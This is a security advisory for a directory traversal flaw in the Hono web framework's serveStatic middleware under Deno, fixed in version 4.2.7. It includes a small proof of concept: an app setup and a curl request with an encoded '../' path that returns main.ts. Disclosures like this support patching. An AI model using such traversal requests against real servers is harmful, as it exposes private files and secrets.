Описание
Hono vulnerable to Restricted Directory Traversal in serveStatic with deno
Summary
When using serveStatic with deno, it is possible to directory traverse where main.ts is located.
My environment is configured as per this tutorial https://hono.dev/getting-started/deno
PoC
$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
└── a.txt
source
import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'
const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))
Deno.serve(app.fetch)
request
curl localhost:8000/static/%2e%2e/main.ts
response is content of main.ts
Impact
Unexpected files are retrieved.
Пакеты
Наименование
hono
npm
Затронутые версииВерсия исправления
< 4.2.7
4.2.7
Связанные уязвимости
CVSS3: 5.3
nvd
почти 2 года назад
Hono is a Web application framework that provides support for any JavaScript runtime. Prior to version 4.2.7, when using serveStatic with deno, it is possible to traverse the directory where `main.ts` is located. This can result in retrieval of unexpected files. Version 4.2.7 contains a patch for the issue.